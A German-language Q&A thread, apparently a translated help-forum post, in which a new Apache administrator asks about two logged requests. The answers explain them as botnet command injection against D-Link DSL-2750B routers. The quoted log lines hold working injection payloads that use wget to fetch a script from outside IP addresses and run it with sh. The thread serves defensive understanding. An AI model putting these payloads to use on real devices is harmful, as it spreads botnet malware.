Ich baue einen neuen Server auf Apache, eigentlich lerne ich noch dazu, also probiere ich verschiedene Dinge aus. Mein Sicherheitssystem ist bereits fertig, aber natürlich kann ich etwas übersehen, oder, falls nicht, verstehe ich, dass mich heute kein System zu 100 % schützen kann. Warum also denke ich, dass jemand es bei mir versucht hat, nur weil ich Folgendes in meinen Protokollen erhalten habe:
1.53.11.43 - - [01/Sep/2018:23:48:30 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://148.72.176.78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$ HTTP/1.1" 400 566 "-" "Hakai/2.0"
41.47.195.103 - - [01/Sep/2018:22:48:49 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 566
Da war noch mehr. Ich verstehe, dass dieser jemand einen Fehler 400 erhält und das ist nicht schlimm für mich. Meine Frage ist also eigentlich nicht, ob sie es bei mir versuchen, denn ich denke, das ist so, weil es keine normale Anfrage an meine Site zu sein scheint. Ich möchte eine Erklärung dieser Anfrage, um sie zu verstehen und zu lernen. Was versuchen sie eigentlich zu tun, mein Anmeldesystem zu finden und es irgendwohin zu schicken?
PS: Ich weiß bereits, dass wgetSie mit einigen Websites herunterladen können. Ich habe auch herausgefunden, dass es login.cgisich um ein Cookie-basiertes Authentifizierungsprogramm handelt.
Danke schön!
Antwort1
Ihr ungebetener Besucher versucht nicht, seinen Versuch zu verbergen, ein Skript auf Ihren Server herunterzuladen und auszuführen.
Er geht vielleicht davon aus, dass Sie nicht nur ein solches login.cgiSkript installiert haben, sondern dass es seine Eingaben auch nicht richtig verarbeitet und daher alles nach dem Apostroph ( %27im codierten Protokoll) direkt ausführt. Sie haben wahrscheinlich kein solches anfälliges Skript, aber die Annahme, dass der HTTP-Code 400 immer bedeutet, dass Sie nicht betroffen sind, ist unbegründet.
Dies ist höchstwahrscheinlich ein unbeaufsichtigter Angriff, der sich gegen große Gruppen zufällig ausgewählter Ziele richtet. Man kann nur spekulieren, was das Skript enthalten haben könnte, das heruntergeladen und ausgeführt werden sollte. Man kann davon ausgehen, dass Sie das nicht feststellen können, da der Server, der das Skript liefert, normalerweise unterschiedliche Skripte(+) bereitstellt, je nachdem, ob er davon ausgeht, dass der Angriff bisher erfolgreich war, oder ob er untersucht wird.
Es ist durchaus möglich, dass der Angreifer die Codeausführung ebenfalls für unwahrscheinlich hielt und stattdessen nur Informationen über Ihr System sammeln wollte. Alle internetfähigen Geräte sollten regelmäßig mit solchen Anfragen rechnen und alle Skripte auf Ihrem Webserver sollten so geschrieben sein, dass Sie sich darüber nie Sorgen machen müssen.
(+)WarumWürde ein Angreifer andere Skripte bereitstellen? Um die Untersuchung einer Rechteausweitung nach einem Angriff zu erschweren. Das Skript würde später wahrscheinlich aus dem Speicher verloren gehen, daher ist es für den Angreifer sinnvoll, sicherzustellen, dass das Opfer das Skript später nicht mehr abrufen kann.WieWürde der Angreifer unterschiedliche Skripte bereitstellen? Er würde sicherstellen, dass der Webserver nur sehr kurz nach dem Angriff mit der Angriffsnutzlast von der IP-Adresse des angegriffenen Rechners antwortet. Da der Angriff nur entweder sofort erfolgreich sein oder fehlschlagen kann, kann jeder spätere Abruf des Skripts dem Forensikteam oder den Sicherheitsforschern des Opfers zugeschrieben werden. Dies ist kein neuer oder rein theoretischer Mechanismus, ich habe – 2016 – bereits unterschiedliche Nutzlasten basierend auf IPs erhalten (ein Skript war leer, das andere enthielt Befehle zum Laden einer Nutzlast der dritten Stufe).
Antwort2
Es handelt sich nicht um einen gezielten Angriff auf Sie persönlich. Höchstwahrscheinlich wird ein Botnetz eingesetzt, um möglichst viele IP-Adressen anzugreifen.
Das login.cliSkript mit einem Parameter clischeint auf D-Link-Router ausgerichtet zu sein. Es handelt sich wahrscheinlich um eine Variante vonD-Link DSL-2750B – OS-Befehlsinjektion:
Dieses Modul nutzt eine Remote Command Injection-Schwachstelle in D-Link DSL-2750B-Geräten aus. Die Schwachstelle kann über den Parameter „cli“ ausgenutzt werden, der direkt zum Aufrufen der Binärdatei „ayecli“ verwendet wird. Anfällige Firmwares sind von 1.01 bis 1.03.
Es gibt Sammlungen von Sperrlisten für Webserver wie nginx oder Apache, mit denen Sie alle derartigen Anfragen blockieren können. Je nach Datenverkehr kann dies sinnvoll sein, insbesondere wenn Sie eine kleine private Website haben, die nicht viel Datenverkehr erwartet.
Antwort3
Ich weiß, dass dieser Beitrag etwas über ein Jahr alt ist, ich kann jedoch etwas Klarheit dazu schaffen.
Es ist tatsächlich Teil eines Botnetzes. Das Skript, das es herunterzuladen versucht, ist ein Dropper, der versucht, die heruntergeladene Datei (Dropped File) herunterzuladen, ausführbare Bits/Berechtigungen hinzuzufügen und die Datei auszuführen und anschließend zu entfernen.
Ich habe die neue Version dieses Droppers analysiert. Es handelt sich um ein unverschlüsseltes Shell-Skript. Dieses Netzwerk ist heute, kurz vor 2020, wieder aktiv geworden.
Was die Frage der Verwendung unterschiedlicher Skripte betrifft, könnte der Entwickler separate Skripte erstellt haben, die auf unterschiedlichen Betriebssystemen laufen. Es sieht so aus, als hätte jemand dieses Botnetz neu verpackt und versucht, es weiterzuverteilen. Hier ist ein Virus insgesamtGraphdas die neue Aktivität dieses bestimmten Botnetzes zeigt.